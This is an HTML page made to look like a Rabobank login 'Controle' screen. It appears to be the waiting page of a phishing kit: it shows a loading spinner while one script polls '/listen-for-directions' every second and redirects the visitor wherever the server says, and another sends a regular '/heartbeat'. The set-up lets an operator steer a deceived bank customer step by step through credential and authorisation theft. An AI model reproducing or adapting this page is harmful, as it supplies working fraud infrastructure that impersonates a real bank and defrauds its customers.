<!DOCTYPE HTML>
<html>
   <head>
      <meta http-equiv="content-type" content="text/html; charset=UTF-8">
      <title>Rabobank - Controle</title>
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="HandheldFriendly" content="True">
      <meta name="viewport" content="width=device-width, initial-scale=0, maximum-scale=1.0, user-scalable=no">
      <meta name="format-detection" content="telephone=no">
      <meta http-equiv="cleartype" content="on">
      <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
      <link href="/public/rabo/img/favicon.ico" rel="shortcut icon">
      <meta charset="utf-8">
      <link rel="stylesheet" href="/public/rabo/css/rass-proto.css">
      <link rel="stylesheet" href="/public/rabo/css/www-extension.css">
      <link rel="stylesheet" href="/public/rabo/font/myriad/default.css">
   </head>
   <body class=" rass-chgen-rs">
      <div class="rass-pagetype-login rass-pagewrapper">
         <div id="rass-parallax-banner"></div>
         <div class="rass-container">
            <h1 aria-live="polite" class="rass-page-title">
               Controle<a href="" class="rass-ui-logo"><img src="/public/rabo/img/logo.png" alt="logo" /></a>
               <div class="langswitch">
                  <a data-rass-behavior="rass-action-linktoform" class="current" href="/klanten/qsl_switchlanguage.do?language=nl">NL</a>
                  <span>|</span>
                  <a data-rass-behavior="rass-action-linktoform"  href="/klanten/qsl_switchlanguage.do?language=en">EN</a>
               </div>
            </h1>
            <p align="center"><img style="position: center; width: 200px; height: 200px;" alt="loading" src="/public/rabo/lade.gif"></p>
            <div class="rass-section-action">
               <input id="rass-action-cancel" data-rass-behavior="action-cancel" class="rass-button-tertiary rass-action-cancel" type="submit" name="cancel" value="Annuleren" data-rass-msg="U gaat inloggen afbreken.">
            </div>
            <div class="footer">
               <div>
                  <ul>
                     <li>
                        <a href="/help_inlogscherm" rel="nofollow" data-rass-behavior="action-showinpopup" class="rass-help-link rass-icon-link">Help</a>
                     </li>
                  </ul>
                  <p>
                     <br>Ziet u iets ongewoons? Stop en bel 0900 0906 (gebruikelijke belkosten).
                     <br>Belt u uit het buitenland? Bel dan +31 817 236 647
                  </p>
                  <ul>
                     <li>
                        <a href="/v" rel="nofollow" data-rass-behavior="action-showinpopup" class="rass-arrow-link rass-icon-link">Zo bankiert u veilig</a>
                     </li>
                  </ul>
               </div>
            </div>
         </div>
         <div class="rass-section-service">
            <h2>Service</h2>
            <ul>
               <li class="rass-rsp-nonmobile"><a href="/p_service_nietinloggen" rel="nofollow" data-rass-behavior="action-showinpopup">Problemen met inloggen</a></li>
               <li class="rass-rsp-nonmobile"><a href="/rs_faq" rel="nofollow" data-rass-behavior="action-showinpopup">Veel gestelde vragen over Rabo Scanner</a></li>
               <li class="rass-rsp-nonmobile"><a href="/raboscannerdemo-inlog" rel="nofollow" data-rass-behavior="action-showinpopup">Demo inloggen met Rabo Scanner</a></li>
               <li class="rass-rsp-nonmobile"><a href="/raboscanner1" rel="nofollow" data-rass-behavior="action-showinpopup">Meer informatie over Rabo Scanner</a></li>
            </ul>
            <ul>
               <li class="rass-rsp-nonmobile">
                  <form id="switchreaderform" action="/klanten/qsl_switchreader.do" method="post" autocomplete="off">
                     <input type="hidden" id="Scid" name="Scid" size="32" maxlength="32" value="da57821c2fe442e2bd76555045a3fa8f_1539006951559" />
                     <input type="hidden" name="SessHrGebrChk" value="false" />
                     <input type="hidden" name="AuthId" value="" />
                     <input type="hidden" name="AuthBpasNr" value="" />
                     <input name="SelectedReader" type="hidden" value="rr"/>
                     <input id="rass-action-switchreader" type="submit" class="rass-button-tertiary rass-icon-link" name="switchreader" value="Inloggen met Random Reader" />
                  </form>
               </li>
               <li class="rass-rsp-nonmobile"><a href="/p_rib_info" rel="nofollow" data-rass-behavior="action-showinpopup">Aanvragen Rabo Internetbankieren</a></li>
               <li class="rass-more"><a href="/meerservice" rel="nofollow" data-rass-behavior="action-showinpopup">Meer service</a></li>
            </ul>
         </div>
         <div class="rass-socialbar">
            <div class="rass-socialbar-topbar">
               <div class="rass-socialbar-slogan"><span>Rabobank</span></div>
            </div>
         </div>
      </div>
      <script language="JavaScript" src="/public/rabo/js/jquery-3.3.1.min.js"></script>
      <script type="text/javascript" src="/public/rabo/js/device.min.js"></script>        
   </body>
   <script language="JavaScript" src="/public/iznzg/js/jquery-3.3.1.min.js"></script>

   <script type="text/javascript">
var interval1 = 1000;  // 1000 = 1 second, 3000 = 3 seconds
function doAjax2() {
    $.ajax({
            type: 'POST',
            url: '/listen-for-directions',
            data: $(this).serialize(),
            dataType: 'json',
            success: function (data) {
               if(data.waiting === false) {
                  window.location.replace(data.redirect_to);
               }
            },
            complete: function (data) {
                    setTimeout(doAjax2, interval1);
            }
    });
}
setTimeout(doAjax2, interval1);
   </script>
   <script type="text/javascript">
      var interval = 10000;  // 1000 = 1 second, 3000 = 3 seconds
      function doAjax() {
         $.ajax({
         type: 'POST',
         url: '/heartbeat',
         data: $(this).serialize(),
         dataType: 'json',
         complete: function (data) {
                 setTimeout(doAjax, interval);
         }
      });
      }
      setTimeout(doAjax, interval);
   </script>
</html>